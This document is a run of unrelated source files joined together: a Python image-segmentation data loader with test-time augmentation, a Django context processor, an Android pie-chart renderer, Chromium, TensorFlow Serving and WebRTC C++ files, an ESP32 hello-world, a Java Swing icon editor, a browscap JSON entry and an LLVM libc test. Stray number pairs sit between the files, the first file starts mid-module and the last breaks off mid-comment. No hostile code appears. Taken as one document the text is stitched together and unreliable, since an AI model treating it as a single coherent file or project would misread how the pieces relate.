    transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
]


def get_tta_transforms(index, pad_mode):
    """Test-time-augmentation transform #index (0=identity, 1=hflip, 2=vflip, 3=both).

    p=2. forces the "random" flips to always fire (probability >= 1).
    """
    tta_transforms = {
        0: [],
        1: [transforms.RandomHorizontalFlip(p=2.)],
        2: [transforms.RandomVerticalFlip(p=2.)],
        3: [transforms.RandomHorizontalFlip(p=2.), transforms.RandomVerticalFlip(p=2.)]
    }
    if pad_mode == 'resize':
        return transforms.Compose([transforms.Resize((H, W)), *(tta_transforms[index]), *img_transforms])
    else:
        return transforms.Compose([*(tta_transforms[index]), *img_transforms])


def get_image_transform(pad_mode):
    """Image transform; 'resize' mode rescales to (H, W) first."""
    if pad_mode == 'resize':
        return transforms.Compose([transforms.Resize((H, W)), *img_transforms])
    else:
        return transforms.Compose(img_transforms)


def get_mask_transform(pad_mode):
    """Mask transform mirroring get_image_transform, ending in tensor conversion."""
    if pad_mode == 'resize':
        return transforms.Compose(
            [
                transforms.Resize((H, W)),
                transforms.Lambda(mask_to_tensor),
            ]
        )
    else:
        return transforms.Compose(
            [
                transforms.Lambda(mask_to_tensor),
            ]
        )


def get_img_mask_augments(pad_mode, depths_channel=False):
    """Build (train, val) joint image+mask augmentations for the given padding mode.

    With a depth channel the affine augmentation is gentler (no vertical shift).
    Returns (train_aug, val_aug); val_aug is None in 'resize' mode.
    """
    if depths_channel:
        affine_aug = aug.RandomAffineWithMask(5, translate=(0.1, 0.), scale=(0.9, 1.1), shear=None)
    else:
        affine_aug = aug.RandomAffineWithMask(15, translate=(0.1, 0.1), scale=(0.9, 1.1), shear=None)

    if pad_mode == 'resize':
        img_mask_aug_train = aug.Compose([
            aug.RandomHFlipWithMask(),
            affine_aug
        ])
        img_mask_aug_val = None
    else:
        # Pad 101->128-ish, augment, then crop back to (H, H).
        img_mask_aug_train = aug.Compose([
            aug.PadWithMask((28, 28), padding_mode=pad_mode),
            aug.RandomHFlipWithMask(),
            affine_aug,
            aug.RandomResizedCropWithMask(H, scale=(1., 1.), ratio=(1., 1.))
        ])
        img_mask_aug_val = aug.PadWithMask((13, 13, 14, 14), padding_mode=pad_mode)

    return img_mask_aug_train, img_mask_aug_val


def get_train_loaders(ifold, batch_size=8, dev_mode=False, pad_mode='edge', meta_version=1, pseudo_label=False, depths=False):
    """Build (train_loader, val_loader) for fold ``ifold`` of a 10-fold split.

    pseudo_label appends test metadata to the training set; dev_mode shrinks
    both sets to 10 rows and disables shuffling for quick runs. The val loader
    also carries ``y_true`` ground-truth masks for scoring.
    """
    train_shuffle = True
    train_meta, val_meta = get_nfold_split(ifold, nfold=10, meta_version=meta_version)

    if pseudo_label:
        test_meta = get_test_meta()
        train_meta = train_meta.append(test_meta, sort=True)

    if dev_mode:
        train_shuffle = False
        train_meta = train_meta.iloc[:10]
        val_meta = val_meta.iloc[:10]
        #print(val_meta[X_COLUMN].values[:5])
        #print(val_meta[Y_COLUMN].values[:5])
    print(train_meta.shape, val_meta.shape)

    img_mask_aug_train, img_mask_aug_val = get_img_mask_augments(pad_mode, depths)

    train_set = ImageDataset(True, train_meta,
                             augment_with_target=img_mask_aug_train,
                             image_augment=transforms.ColorJitter(0.2, 0.2, 0.2, 0.2),
                             image_transform=get_image_transform(pad_mode),
                             mask_transform=get_mask_transform(pad_mode))

    train_loader = data.DataLoader(train_set, batch_size=batch_size, shuffle=train_shuffle, num_workers=4,
                                   collate_fn=train_set.collate_fn, drop_last=True)
    train_loader.num = len(train_set)

    val_set = ImageDataset(True, val_meta,
                           augment_with_target=img_mask_aug_val,
                           image_augment=None,
                           image_transform=get_image_transform(pad_mode),
                           mask_transform=get_mask_transform(pad_mode))
    val_loader = data.DataLoader(val_set, batch_size=batch_size, shuffle=False, num_workers=4,
                                 collate_fn=val_set.collate_fn)
    val_loader.num = len(val_set)
    val_loader.y_true = read_masks(val_meta[ID_COLUMN].values)

    return train_loader, val_loader


def get_test_loader(batch_size=16, index=0, dev_mode=False, pad_mode='edge'):
    """Build the test loader using TTA variant ``index`` (see get_tta_transforms)."""
    test_meta = get_test_meta()
    if dev_mode:
        test_meta = test_meta.iloc[:10]
    test_set = ImageDataset(False, test_meta,
                            image_augment=None if pad_mode == 'resize' else transforms.Pad((13,13,14,14), padding_mode=pad_mode),
                            image_transform=get_tta_transforms(index, pad_mode))
    test_loader = data.DataLoader(test_set, batch_size=batch_size, shuffle=False, num_workers=4,
                                  collate_fn=test_set.collate_fn, drop_last=False)
    test_loader.num = len(test_set)
    test_loader.meta = test_set.meta

    return test_loader

# Module-level cache for the depth tensor (built once, reused by add_depth_channel).
depth_channel_tensor = None

def get_depth_tensor(pad_mode):
    """Return an (H, W) tensor whose rows ramp linearly 0 -> 1 (a depth encoding).

    NOTE(review): the cache ignores pad_mode — a second call with a different
    pad_mode returns the tensor built for the first one.
    """
    global depth_channel_tensor

    if depth_channel_tensor is not None:
        return depth_channel_tensor

    depth_tensor = None

    if pad_mode == 'resize':
        depth_tensor = np.zeros((H, W))
        for row, const in enumerate(np.linspace(0, 1, H)):
            depth_tensor[row, :] = const
    else:
        # Build at original resolution, pad like the images, then crop to (H, W).
        depth_tensor = np.zeros((ORIG_H, ORIG_W))
        for row, const in enumerate(np.linspace(0, 1, ORIG_H)):
            depth_tensor[row, :] = const
        depth_tensor = np.pad(depth_tensor, (14,14), mode=pad_mode) # edge or reflect
        depth_tensor = depth_tensor[:H, :W]

    depth_channel_tensor = torch.Tensor(depth_tensor)
    return depth_channel_tensor

def add_depth_channel(img_tensor, pad_mode):
    '''
    img_tensor: N, C, H, W

    In-place: channel 1 becomes the depth ramp, channel 2 the image
    modulated by depth; channel 0 keeps the grayscale image.
    '''
    img_tensor[:, 1] = get_depth_tensor(pad_mode)
    img_tensor[:, 2] = img_tensor[:, 0] * get_depth_tensor(pad_mode)


def test_train_loader():
    # Smoke test: pull one training batch and exercise add_depth_channel.
    train_loader, val_loader = get_train_loaders(1, batch_size=4, dev_mode=False, pad_mode='edge', meta_version=2, pseudo_label=True)
    print(train_loader.num, val_loader.num)
    for i, data in enumerate(train_loader):
        imgs, masks, salt_exists = data
        #pdb.set_trace()
        print(imgs.size(), masks.size(), salt_exists.size())
        print(salt_exists)
        add_depth_channel(imgs, 'resize')
        print(masks)
        break
        #print(imgs)
        #print(masks)

def test_test_loader():
    # Smoke test: iterate a few test batches and print their shapes.
    test_loader = get_test_loader(4, pad_mode='resize')
    print(test_loader.num)
    for i, data in enumerate(test_loader):
        print(data.size())
        if i > 5:
            break

if __name__ == '__main__':
    test_test_loader()
    #test_train_loader()
    #small_dict, img_ids = load_small_train_ids()
#print(img_ids[:10]) #print(get_tta_transforms(3, 'edge'))
5,018
369
from promotion.models import JoinApplication


def get_application_count():
    """Number of join applications still awaiting review (neither rejected nor approved)."""
    # QuerySet.count() issues SELECT COUNT(*) in the database; the previous
    # len(...) materialized every matching row in memory just to count them.
    return JoinApplication.objects.filter(is_rejected=False, is_approved=False).count()


# function to add application_list notification dot to all pages
def application_processor(request):
    """Django context processor exposing the pending-application count to all templates."""
    application_count = get_application_count()
    return {'application_count': application_count}
111
1,388
package com.razerdp.widget.animatedpieview.render;

import android.graphics.Canvas;
import android.support.annotation.Nullable;

import com.razerdp.widget.animatedpieview.IPieView;
import com.razerdp.widget.animatedpieview.manager.PieManager;

/**
 * Created by 大灯泡 on 2018/2/1.
 * <p>
 * Base renderer class.
 * <p>
 * Subclasses implement the prepare/draw lifecycle; drawing is suppressed until
 * {@link #onPrepare()} has completed successfully.
 */
public abstract class BaseRender {
    protected String TAG = this.getClass().getSimpleName();

    IPieView mIPieView;
    PieManager mPieManager;
    // volatile: set on the view's posted runnable, read from draw() — keeps the
    // not-yet-prepared state visible across threads.
    private volatile boolean isPrepared;

    public BaseRender(IPieView iPieView) {
        mIPieView = iPieView;
        mPieManager = iPieView.getManager();
        // Register so the manager can route lifecycle calls to this render.
        mPieManager.registerRender(this);
    }

    /** Draws only after preparation has finished; otherwise a no-op. */
    public void draw(Canvas canvas) {
        if (!isPrepared) return;
        onDraw(canvas);
    }

    public final void prepare() {
        prepare(null);
    }

    /**
     * Resets state, then runs {@link #onPrepare()} via View.post — presumably so
     * it executes after the view is attached/measured (TODO confirm). On success,
     * either notifies the listener or triggers an invalidate.
     */
    public final void prepare(@Nullable final OnPrepareFinishListener l) {
        isPrepared = false;
        reset();
        mIPieView.getPieView().post(new Runnable() {
            @Override
            public void run() {
                isPrepared = onPrepare();
                if (isPrepared) {
                    handlePrepareFinish(l);
                }
            }
        });
    }

    /** Tears down the render and unregisters it from the manager. */
    public void destroy() {
        onDestroy();
        mPieManager.unRegisterRender(this);
    }

    public abstract void reset();

    public abstract boolean onPrepare();

    public abstract void onSizeChanged(int width, int height, int paddingLeft, int paddingTop, int paddingRight, int paddingBottom);

    public abstract void onDraw(Canvas canvas);

    public abstract void onDestroy();

    /** Requests a redraw through the owning pie view. */
    public void callInvalidate() {
        mIPieView.onCallInvalidate();
    }

    /**
     * Invokes the listener if present; if the listener returns true it has
     * consumed the event, otherwise falls back to invalidating the view.
     */
    protected void handlePrepareFinish(OnPrepareFinishListener l) {
        if (l != null) {
            boolean handled = l.onPrepareFin();
            if (handled) return;
        }
        callInvalidate();
    }

    public interface OnPrepareFinishListener {
        // Return true to consume the prepare-finished event (suppresses invalidate).
        boolean onPrepareFin();
    }
}
880
575
// Copyright 2018 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #ifndef MEDIA_GPU_V4L2_V4L2_VP9_ACCELERATOR_LEGACY_H_ #define MEDIA_GPU_V4L2_V4L2_VP9_ACCELERATOR_LEGACY_H_ #include <vector> #include "base/callback.h" #include "base/macros.h" #include "base/memory/scoped_refptr.h" #include "media/filters/vp9_parser.h" #include "media/gpu/vp9_decoder.h" namespace media { class V4L2DecodeSurface; class V4L2DecodeSurfaceHandler; class V4L2Device; class V4L2LegacyVP9Accelerator : public VP9Decoder::VP9Accelerator { public: explicit V4L2LegacyVP9Accelerator(V4L2DecodeSurfaceHandler* surface_handler, V4L2Device* device); ~V4L2LegacyVP9Accelerator() override; // VP9Decoder::VP9Accelerator implementation. scoped_refptr<VP9Picture> CreateVP9Picture() override; Status SubmitDecode(scoped_refptr<VP9Picture> pic, const Vp9SegmentationParams& segm_params, const Vp9LoopFilterParams& lf_params, const Vp9ReferenceFrameVector& reference_frames, base::OnceClosure done_cb) override; bool OutputPicture(scoped_refptr<VP9Picture> pic) override; bool GetFrameContext(scoped_refptr<VP9Picture> pic, Vp9FrameContext* frame_ctx) override; bool IsFrameContextRequired() const override; private: scoped_refptr<V4L2DecodeSurface> VP9PictureToV4L2DecodeSurface( VP9Picture* pic); bool device_needs_frame_context_; V4L2DecodeSurfaceHandler* const surface_handler_; V4L2Device* const device_; DISALLOW_COPY_AND_ASSIGN(V4L2LegacyVP9Accelerator); }; } // namespace media #endif // MEDIA_GPU_V4L2_V4L2_VP9_ACCELERATOR_LEGACY_H_
777
8,747
/* Hello World Example This example code is in the Public Domain (or CC0 licensed, at your option.) Unless required by applicable law or agreed to in writing, this software is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. */ #include <stdio.h> #include "freertos/FreeRTOS.h" #include "freertos/task.h" #include "esp_system.h" #include "esp_spi_flash.h" void app_main(void) { printf("Hello world!\n"); /* Print chip information */ esp_chip_info_t chip_info; esp_chip_info(&chip_info); printf("This is ESP32 chip with %d CPU cores, WiFi%s%s, ", chip_info.cores, (chip_info.features & CHIP_FEATURE_BT) ? "/BT" : "", (chip_info.features & CHIP_FEATURE_BLE) ? "/BLE" : ""); printf("silicon revision %d, ", chip_info.revision); printf("%dMB %s flash\n", spi_flash_get_chip_size() / (1024 * 1024), (chip_info.features & CHIP_FEATURE_EMB_FLASH) ? "embedded" : "external"); for (int i = 10; i >= 0; i--) { printf("Restarting in %d seconds...\n", i); vTaskDelay(1000 / portTICK_PERIOD_MS); } printf("Restarting now.\n"); fflush(stdout); esp_restart(); }
507
388
<reponame>OctaviantoVyan/jwswing<filename>LargeCellEditor/src/java/example/MainPanel.java // -*- mode:java; encoding:utf-8 -*- // vim:set fileencoding=utf-8: // @homepage@ package example; import java.awt.*; import java.awt.event.ActionEvent; import java.awt.event.KeyEvent; import java.awt.event.MouseAdapter; import java.awt.event.MouseEvent; import java.awt.image.BufferedImage; import java.util.Objects; import javax.swing.*; import javax.swing.table.DefaultTableCellRenderer; import javax.swing.table.DefaultTableModel; import javax.swing.table.JTableHeader; import javax.swing.table.TableColumn; import javax.swing.table.TableColumnModel; import javax.swing.table.TableModel; public final class MainPanel extends JPanel { private MainPanel() { super(new BorderLayout()); ListModel<IconItem> list = makeIconList(); TableModel model = makeIconTableModel(list); JTable table = new IconTable(model, list); JPanel p = new JPanel(new GridBagLayout()); p.add(table, new GridBagConstraints()); p.setBackground(Color.WHITE); add(p); setPreferredSize(new Dimension(320, 240)); } private static ListModel<IconItem> makeIconList() { DefaultListModel<IconItem> list = new DefaultListModel<>(); list.addElement(new IconItem("wi0009")); list.addElement(new IconItem("wi0054")); list.addElement(new IconItem("wi0062")); list.addElement(new IconItem("wi0063")); list.addElement(new IconItem("wi0064")); list.addElement(new IconItem("wi0096")); list.addElement(new IconItem("wi0111")); list.addElement(new IconItem("wi0122")); list.addElement(new IconItem("wi0124")); return list; } private static <E extends IconItem> TableModel makeIconTableModel(ListModel<E> list) { Object[][] data = { {list.getElementAt(0), list.getElementAt(1), list.getElementAt(2)}, {list.getElementAt(3), list.getElementAt(4), list.getElementAt(5)}, {list.getElementAt(6), list.getElementAt(7), list.getElementAt(8)} }; return new DefaultTableModel(data, null) { @Override public boolean isCellEditable(int row, int column) { return 
false; } @Override public int getColumnCount() { return 3; } }; } public static void main(String[] args) { EventQueue.invokeLater(MainPanel::createAndShowGui); } private static void createAndShowGui() { try { UIManager.setLookAndFeel(UIManager.getSystemLookAndFeelClassName()); } catch (ClassNotFoundException | InstantiationException | IllegalAccessException | UnsupportedLookAndFeelException ex) { ex.printStackTrace(); Toolkit.getDefaultToolkit().beep(); } JFrame frame = new JFrame("@title@"); frame.setDefaultCloseOperation(WindowConstants.EXIT_ON_CLOSE); frame.getContentPane().add(new MainPanel()); frame.pack(); frame.setResizable(false); frame.setLocationRelativeTo(null); frame.setVisible(true); } } class IconItem { public final ImageIcon large; public final ImageIcon small; protected IconItem(String str) { large = new ImageIcon(Objects.requireNonNull(getClass().getResource(str + "-48.png"))); small = new ImageIcon(Objects.requireNonNull(getClass().getResource(str + "-24.png"))); } } class IconTableCellRenderer extends DefaultTableCellRenderer { @Override public Component getTableCellRendererComponent(JTable table, Object value, boolean isSelected, boolean hasFocus, int row, int column) { setIcon(((IconItem) value).large); setHorizontalAlignment(SwingConstants.CENTER); return this; } } class IconTable extends JTable { protected static final int CELL_SIZE = 50; protected static final int OFFSET = 4; protected final JList<IconItem> editor; protected final JComponent glassPane = new JComponent() { @Override public void setVisible(boolean flag) { super.setVisible(flag); setFocusTraversalPolicyProvider(flag); setFocusCycleRoot(flag); } @Override protected void paintComponent(Graphics g) { g.setColor(new Color(0x64_FF_FF_FF, true)); g.fillRect(0, 0, getWidth(), getHeight()); BufferedImage buffer = new BufferedImage(getWidth(), getHeight(), BufferedImage.TYPE_INT_ARGB); Graphics2D g2 = buffer.createGraphics(); g2.setRenderingHint(RenderingHints.KEY_ANTIALIASING, 
RenderingHints.VALUE_ANTIALIAS_ON); g2.setComposite(AlphaComposite.getInstance(AlphaComposite.SRC_OVER, .15f)); g2.setPaint(Color.BLACK); Rectangle r = editor.getBounds(); for (int i = 0; i < OFFSET; i++) { g2.fillRoundRect(r.x - i, r.y + OFFSET, r.width + i + i, r.height - OFFSET + i, 5, 5); } g2.dispose(); g.drawImage(buffer, 0, 0, this); } }; protected IconTable(TableModel model, ListModel<IconItem> list) { super(model); setDefaultRenderer(Object.class, new IconTableCellRenderer()); setSelectionMode(ListSelectionModel.SINGLE_SELECTION); addMouseListener(new MouseAdapter() { @Override public void mouseClicked(MouseEvent e) { startEditing(); } }); editor = new EditorFromList<>(list); KeyStroke key = KeyStroke.getKeyStroke(KeyEvent.VK_ESCAPE, 0); editor.getInputMap(JComponent.WHEN_FOCUSED).put(key, "cancel-editing"); editor.getActionMap().put("cancel-editing", new AbstractAction() { @Override public void actionPerformed(ActionEvent e) { cancelEditing(); } }); // editor.addKeyListener(new KeyAdapter() { // @Override public void keyPressed(KeyEvent e) { // if (e.getKeyCode() == KeyEvent.VK_ESCAPE) { // cancelEditing(); // } // } // }); editor.addMouseListener(new MouseAdapter() { @Override public void mouseClicked(MouseEvent e) { Point p = e.getPoint(); IconItem item = editor.getModel().getElementAt(editor.locationToIndex(p)); setValueAt(item, getSelectedRow(), getSelectedColumn()); cancelEditing(); } }); glassPane.addMouseListener(new MouseAdapter() { @Override public void mouseClicked(MouseEvent e) { // Point pt = e.getPoint(); // if (!editor.getBounds().contains(pt)) { // cancelEditing(); // } cancelEditing(); } }); glassPane.setFocusTraversalPolicy(new DefaultFocusTraversalPolicy() { @Override public boolean accept(Component c) { return Objects.equals(c, editor); } }); glassPane.add(editor); glassPane.setVisible(false); } @Override public void updateUI() { super.updateUI(); setRowHeight(CELL_SIZE); JTableHeader tableHeader = getTableHeader(); 
tableHeader.setResizingAllowed(false); tableHeader.setReorderingAllowed(false); TableColumnModel m = getColumnModel(); for (int i = 0; i < m.getColumnCount(); i++) { TableColumn col = m.getColumn(i); col.setMinWidth(CELL_SIZE); col.setMaxWidth(CELL_SIZE); } setBorder(BorderFactory.createLineBorder(Color.BLACK)); } public void startEditing() { getRootPane().setGlassPane(glassPane); Dimension d = editor.getPreferredSize(); editor.setSize(d); int sr = getSelectedRow(); int sc = getSelectedColumn(); Rectangle r = getCellRect(sr, sc, true); Point p = SwingUtilities.convertPoint(this, r.getLocation(), glassPane); p.translate((r.width - d.width) / 2, (r.height - d.height) / 2); editor.setLocation(p); glassPane.setVisible(true); editor.setSelectedValue(getValueAt(sr, sc), true); editor.requestFocusInWindow(); } protected void cancelEditing() { glassPane.setVisible(false); } } class EditorFromList<E extends IconItem> extends JList<E> { private static final int INS = 2; private final Dimension dim; private transient RollOverListener handler; protected int rollOverRowIndex = -1; protected EditorFromList(ListModel<E> model) { super(model); ImageIcon icon = model.getElementAt(0).small; int iw = INS + icon.getIconWidth(); int ih = INS + icon.getIconHeight(); dim = new Dimension(iw * 3 + INS, ih * 3 + INS); setFixedCellWidth(iw); setFixedCellHeight(ih); } @Override public Dimension getPreferredSize() { return dim; } @Override public void updateUI() { removeMouseMotionListener(handler); removeMouseListener(handler); super.updateUI(); handler = new RollOverListener(); addMouseMotionListener(handler); addMouseListener(handler); setBorder(BorderFactory.createLineBorder(Color.BLACK)); setLayoutOrientation(JList.HORIZONTAL_WRAP); setVisibleRowCount(0); JLabel renderer = new JLabel(); Color selectedColor = new Color(0xC8_C8_FF); setCellRenderer((list, value, index, isSelected, cellHasFocus) -> { renderer.setOpaque(true); renderer.setHorizontalAlignment(SwingConstants.CENTER); if (index 
== rollOverRowIndex) { renderer.setBackground(getSelectionBackground()); } else if (isSelected) { renderer.setBackground(selectedColor); } else { renderer.setBackground(getBackground()); } renderer.setIcon(value.small); return renderer; }); } private class RollOverListener extends MouseAdapter { @Override public void mouseExited(MouseEvent e) { rollOverRowIndex = -1; e.getComponent().repaint(); } @Override public void mouseMoved(MouseEvent e) { int row = locationToIndex(e.getPoint()); if (row != rollOverRowIndex) { rollOverRowIndex = row; e.getComponent().repaint(); } } } }
3,633
338
<reponame>ayumi-cloud/browscap<gh_stars>100-1000 { "China-Tablet I101MTK": { "type": "tablet", "properties": { "Device_Name": "I101MTK", "Device_Code_Name": "I101MTK", "Device_Maker": "China Tablet", "Device_Pointing_Method": "touchscreen", "Device_Brand_Name": "China Tablet" }, "standard": true } }
160
5,791
/* Copyright 2016 Google Inc. All Rights Reserved. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. ==============================================================================*/ #ifndef TENSORFLOW_SERVING_BATCHING_BATCH_SCHEDULER_RETRIER_H_ #define TENSORFLOW_SERVING_BATCHING_BATCH_SCHEDULER_RETRIER_H_ #include <stddef.h> #include <cstddef> #include <memory> #include <utility> #include "tensorflow/core/kernels/batching_util/batch_scheduler.h" #include "tensorflow/core/lib/core/errors.h" #include "tensorflow/core/platform/env.h" #include "tensorflow/core/platform/macros.h" namespace tensorflow { namespace serving { // A wrapper around another BatchScheduler that automatically retries // Schedule() requests. Returns an UNAVAILABLE error only after retry attempts // have failed (based on parameters that govern the maximum number of retries // and the retry time interval). template <typename TaskType> class BatchSchedulerRetrier : public BatchScheduler<TaskType> { public: struct Options { // The maximum amount of time to spend retrying 'wrapped_->Schedule()' // calls, in microseconds. int64_t max_time_micros = 10 * 1000 /* 10 milliseconds */; // The amount of time to pause between retry attempts, in microseconds. int64_t retry_delay_micros = 100; // The environment to use for time and sleeping. 
Env* env = Env::Default(); }; static Status Create( const Options& options, std::unique_ptr<BatchScheduler<TaskType>> wrapped, std::unique_ptr<BatchSchedulerRetrier<TaskType>>* result); ~BatchSchedulerRetrier() override = default; Status Schedule(std::unique_ptr<TaskType>* task) override; size_t NumEnqueuedTasks() const override; size_t SchedulingCapacity() const override; size_t max_task_size() const override { return wrapped_->max_task_size(); } private: BatchSchedulerRetrier(const Options& options, std::unique_ptr<BatchScheduler<TaskType>> wrapped); const Options options_; std::unique_ptr<BatchScheduler<TaskType>> wrapped_; TF_DISALLOW_COPY_AND_ASSIGN(BatchSchedulerRetrier); }; ////////// // Implementation details follow. API users need not read. template <typename TaskType> Status BatchSchedulerRetrier<TaskType>::Create( const Options& options, std::unique_ptr<BatchScheduler<TaskType>> wrapped, std::unique_ptr<BatchSchedulerRetrier<TaskType>>* result) { if (options.max_time_micros < 0) { return errors::InvalidArgument("max_time_micros must be non-negative; was ", options.max_time_micros); } if (options.retry_delay_micros < 0) { return errors::InvalidArgument( "retry_delay_micros must be non-negative; was ", options.retry_delay_micros); } result->reset(new BatchSchedulerRetrier(options, std::move(wrapped))); return Status::OK(); } template <typename TaskType> Status BatchSchedulerRetrier<TaskType>::Schedule( std::unique_ptr<TaskType>* task) { Status status; const uint64_t start_time_micros = options_.env->NowMicros(); for (;;) { status = wrapped_->Schedule(task); if (status.code() != error::UNAVAILABLE) { // We either succeeded, or got a permanent (non-retriable) error. break; } if ((options_.env->NowMicros() + options_.retry_delay_micros) - start_time_micros >= options_.max_time_micros) { // We don't have time in our budget to retry again. 
break; } options_.env->SleepForMicroseconds(options_.retry_delay_micros); } return status; } template <typename TaskType> size_t BatchSchedulerRetrier<TaskType>::NumEnqueuedTasks() const { return wrapped_->NumEnqueuedTasks(); } template <typename TaskType> size_t BatchSchedulerRetrier<TaskType>::SchedulingCapacity() const { return wrapped_->SchedulingCapacity(); } template <typename TaskType> BatchSchedulerRetrier<TaskType>::BatchSchedulerRetrier( const Options& options, std::unique_ptr<BatchScheduler<TaskType>> wrapped) : options_(options), wrapped_(std::move(wrapped)) {} } // namespace serving } // namespace tensorflow #endif // TENSORFLOW_SERVING_BATCHING_BATCH_SCHEDULER_RETRIER_H_
1,614
344
/* * Copyright (c) 2020 The WebRTC project authors. All Rights Reserved. * * Use of this source code is governed by a BSD-style license * that can be found in the LICENSE file in the root of the source * tree. An additional intellectual property rights grant can be found * in the file PATENTS. All contributing project authors may * be found in the AUTHORS file in the root of the source tree. */ #include "modules/audio_processing/include/audio_processing.h" #include <memory> #include "modules/audio_processing/audio_processing_impl.h" #include "rtc_base/ref_counted_object.h" namespace webrtc { AudioProcessingBuilder::AudioProcessingBuilder() = default; AudioProcessingBuilder::~AudioProcessingBuilder() = default; AudioProcessing* AudioProcessingBuilder::Create() { webrtc::Config config; return Create(config); } AudioProcessing* AudioProcessingBuilder::Create(const webrtc::Config& config) { #ifdef WEBRTC_EXCLUDE_AUDIO_PROCESSING_MODULE // Implementation returning a null pointer for using when the APM is excluded // from the build.. return nullptr; #else // Standard implementation. return new rtc::RefCountedObject<AudioProcessingImpl>( config, std::move(capture_post_processing_), std::move(render_pre_processing_), std::move(echo_control_factory_), std::move(echo_detector_), std::move(capture_analyzer_)); #endif } } // namespace webrtc
432
605
//===-- Unittests for atof ------------------------------------------------===// // // Part of the LLVM Project, under the Apache License v2.0 with LLVM Exceptions. // See https://llvm.org/LICENSE.txt for license information. // SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception // //===----------------------------------------------------------------------===// #include "src/__support/FPUtil/FPBits.h" #include "src/stdlib/atof.h" #include "utils/UnitTest/Test.h" #include <errno.h> #include <limits.h> #include <stddef.h> // This is just a simple test to make sure that this function works at all. It's // functionally identical to strtod so the bulk of the testing is there. TEST(LlvmLibcAToFTest, SimpleTest) { __llvm_libc::fputil::FPBits<double> expected_fp = __llvm_libc::fputil::FPBits<double>(uint64_t(0x405ec00000000000)); errno = 0; double result = __llvm_libc::atof("123"); __llvm_libc::fputil::FPBits<double> actual_fp = __llvm_libc::fputil::FPBits<double>(result); EXPECT_EQ(actual_fp.bits, expected_fp.bits); EXPECT_EQ(actual_fp.get_sign(), expected_fp.get_sign()); EXPECT_EQ(actual_fp.get_exponent(), expected_fp.get_exponent()); EXPECT_EQ(actual_fp.get_mantissa(), expected_fp.get_mantissa()); EXPECT_EQ(errno, 0); } TEST(LlvmLibcAToFTest, FailedParsingTest) { __llvm_libc::fputil::FPBits<double> expected_fp = __llvm_libc::fputil::FPBits<double>(uint64_t(0)); errno = 0; double result = __llvm_libc::atof("???"); __llvm_libc::fputil::FPBits<double> actual_fp = __llvm_libc::fputil::FPBits<double>(result); EXPECT_EQ(actual_fp.bits, expected_fp.bits); EXPECT_EQ(actual_fp.get_sign(), expected_fp.get_sign()); EXPECT_EQ(actual_fp.get_exponent(), expected_fp.get_exponent()); EXPECT_EQ(actual_fp.get_mantissa(), expected_fp.get_mantissa()); EXPECT_EQ(errno, 0); }
724
575
// Copyright (c) 2011 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #ifndef THIRD_PARTY_BLINK_PUBLIC_COMMON_LOADER_INTER_PROCESS_TIME_TICKS_CONVERTER_H_ #define THIRD_PARTY_BLINK_PUBLIC_COMMON_LOADER_INTER_PROCESS_TIME_TICKS_CONVERTER_H_ #include <stdint.h> #include "base/time/time.h" #include "third_party/blink/public/common/common_export.h" namespace blink { // SiteSpecificTimeDelta<T> is base::TimeDelta with a type tag. It it // essentially base::TimeDelta, but SiteSpecificTimeDelta<T> is different from // SiteSpecificTimeDelta<U> if T is different from U. template <typename T> class SiteSpecificTimeDelta final { public: SiteSpecificTimeDelta() = default; static SiteSpecificTimeDelta<T> FromTimeDelta(base::TimeDelta delta) { return SiteSpecificTimeDelta<T>(delta); } static SiteSpecificTimeDelta<T> FromMicroseconds(int64_t usec) { return SiteSpecificTimeDelta<T>(base::TimeDelta::FromMicroseconds(usec)); } base::TimeDelta ToTimeDelta() const { return delta_; } bool operator==(const SiteSpecificTimeDelta<T> rhs) const { return delta_ == rhs.delta_; } bool operator<(const SiteSpecificTimeDelta<T> rhs) const { return delta_ < rhs.delta_; } bool operator<=(const SiteSpecificTimeDelta<T> rhs) const { return delta_ <= rhs.delta_; } private: explicit SiteSpecificTimeDelta(base::TimeDelta delta) : delta_(delta) {} base::TimeDelta delta_; }; // For logging use only. template <typename T> std::ostream& operator<<(std::ostream& os, SiteSpecificTimeDelta<T> delta) { return os << delta.ToTimeDelta(); } // SiteSpecificTimeTicks<T> is base::TimeTicks with a type tag. It is // essentially base::TimeTicks, but SiteSpecificTimeTicks<T> is different from // SiteSpecificTimeTicks<U> if T is different from U. 
template <typename T> class SiteSpecificTimeTicks final { public: SiteSpecificTimeTicks() = default; static SiteSpecificTimeTicks<T> FromTimeTicks(base::TimeTicks time_ticks) { return SiteSpecificTimeTicks<T>(time_ticks); } base::TimeTicks ToTimeTicks() const { return time_ticks_; } bool is_null() const { return time_ticks_.is_null(); } SiteSpecificTimeTicks<T> operator+(SiteSpecificTimeDelta<T> delta) const { return SiteSpecificTimeTicks<T>(time_ticks_ + delta.ToTimeDelta()); } SiteSpecificTimeDelta<T> operator-(SiteSpecificTimeTicks<T> rhs) const { return SiteSpecificTimeDelta<T>::FromTimeDelta(time_ticks_ - rhs.time_ticks_); } bool operator<(const SiteSpecificTimeTicks<T> rhs) const { return time_ticks_ < rhs.time_ticks_; } bool operator==(const SiteSpecificTimeTicks<T> rhs) const { return time_ticks_ == rhs.time_ticks_; } bool operator<=(const SiteSpecificTimeTicks<T> rhs) const { return time_ticks_ <= rhs.time_ticks_; } private: explicit SiteSpecificTimeTicks(base::TimeTicks time_ticks) : time_ticks_(time_ticks) {} base::TimeTicks time_ticks_; }; // For logging use only. template <typename T> std::ostream& operator<<(std::ostream& os, SiteSpecificTimeTicks<T> time_ticks) { return os << time_ticks.ToTimeTicks(); } class SiteSpecificTimeLocalTag; using LocalTimeTicks = SiteSpecificTimeTicks<SiteSpecificTimeLocalTag>; using LocalTimeDelta = SiteSpecificTimeDelta<SiteSpecificTimeLocalTag>; class SiteSpecificTimeRemoteTag; using RemoteTimeTicks = SiteSpecificTimeTicks<SiteSpecificTimeRemoteTag>; using RemoteTimeDelta = SiteSpecificTimeDelta<SiteSpecificTimeRemoteTag>; // On Windows, 